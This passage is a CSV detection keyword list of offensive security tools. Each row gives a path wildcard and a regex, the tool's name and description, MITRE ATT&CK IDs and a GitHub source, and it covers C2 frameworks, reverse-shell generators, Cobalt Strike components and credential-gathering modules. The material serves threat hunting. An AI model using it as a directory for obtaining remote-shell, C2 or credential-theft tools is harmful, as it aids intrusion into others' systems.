"*/FudgeC2*",".{0,1000}\/FudgeC2.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*/fuegoshell.git*",".{0,1000}\/fuegoshell\.git.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*/full-nelson.c*",".{0,1000}\/full\-nelson\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/full-nelson64*",".{0,1000}\/full\-nelson64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/FunctionalC2/*",".{0,1000}\/FunctionalC2\/.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","64","16","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*/fuzz.txt*",".{0,1000}\/fuzz\.txt.{0,1000}","offensive_tool_keyword","fuzz.txt","list of sensible files for 
fuzzing in system","T1210 - T1190 - T1203 - T1114","TA0002 - TA0003 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Bo0oM/fuzz.txt/blob/master/fuzz.txt","1","1","N/A","N/A","10","2790","473","2024-03-14T11:36:37Z","2016-01-19T13:35:44Z" "*/fuzzers/dns*",".{0,1000}\/fuzzers\/dns.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/fuzzers/ftp*",".{0,1000}\/fuzzers\/ftp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/fuzzers/http*",".{0,1000}\/fuzzers\/http.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/fuzzers/ntp*",".{0,1000}\/fuzzers\/ntp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/fuzzers/smb*",".{0,1000}\/fuzzers\/smb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/fuzzers/smtp*",".{0,1000}\/fuzzers\/smtp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/fuzzers/ssh*",".{0,1000}\/fuzzers\/ssh.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/FWUprank.ps1",".{0,1000}\/FWUprank\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/G0ldenGunSec/*",".{0,1000}\/G0ldenGunSec\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/GadgetToJScript.git*",".{0,1000}\/GadgetToJScript\.git.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","9","827","154","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*/gandcrab.profile*",".{0,1000}\/gandcrab\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/ganglia-info.nse*",".{0,1000}\/ganglia\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/gather/credentials*",".{0,1000}\/gather\/credentials.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/gather/forensics*",".{0,1000}\/gather\/forensics.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/gather/phish_windows_credentials*",".{0,1000}\/gather\/phish_windows_credentials.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*/gato/*attack.py*",".{0,1000}\/gato\/.{0,1000}attack\.py.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","1","N/A","N/A","5","446","43","2024-04-26T17:00:08Z","2023-01-06T15:43:27Z" "*/GC2-sheet/*",".{0,1000}\/GC2\-sheet\/.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - 
TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","485","98","2024-04-01T15:33:47Z","2021-09-15T19:06:12Z" "*/gcat.git*",".{0,1000}\/gcat\.git.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "*/gcat.py",".{0,1000}\/gcat\.py","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "*/geacon.git*",".{0,1000}\/geacon\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/geacon/*beacon*",".{0,1000}\/geacon\/.{0,1000}beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/geacon_pro*",".{0,1000}\/geacon_pro.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/Gemail-Hack.git*",".{0,1000}\/Gemail\-Hack\.git.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","10","929","368","2024-01-17T15:12:44Z","2018-04-19T13:48:41Z" "*/generate_bind_fuegoshell.ps1*",".{0,1000}\/generate_bind_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*/generate_reverse_fuegoshell.ps1*",".{0,1000}\/generate_reverse_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" 
"*/genHTA*",".{0,1000}\/genHTA.{0,1000}","offensive_tool_keyword","genHTA","Generates anti-sandbox analysis HTA files without payloads. anti-sandbox analysis HTA File Generator","T1564 - T1059 - T1027 - T1055","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/genHTA","1","0","N/A","N/A","1","15","3","2017-03-16T21:49:59Z","2017-06-12T10:58:35Z" "*/GetBrowsers.ps1*",".{0,1000}\/GetBrowsers\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/get-clipboard.py*",".{0,1000}\/get\-clipboard\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/get-desc-users.py*",".{0,1000}\/get\-desc\-users\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/Get-GPPPassword.ps1*",".{0,1000}\/Get\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - 
T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Get-InfectedThread.ps1*",".{0,1000}\/Get\-InfectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Get-InjectedThread.ps1*",".{0,1000}\/Get\-InjectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/getLegit/cdnl*",".{0,1000}\/getLegit\/cdnl.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/getLegit/grkg*",".{0,1000}\/getLegit\/grkg.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/getLegit/prvw*",".{0,1000}\/getLegit\/prvw.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/getLegit/qhwl*",".{0,1000}\/getLegit\/qhwl.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/getLegit/tsom*",".{0,1000}\/getLegit\/tsom.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/getLegit/zijz*",".{0,1000}\/getLegit\/zijz.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/get-loggedon/*.c*",".{0,1000}\/get\-loggedon\/.{0,1000}\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 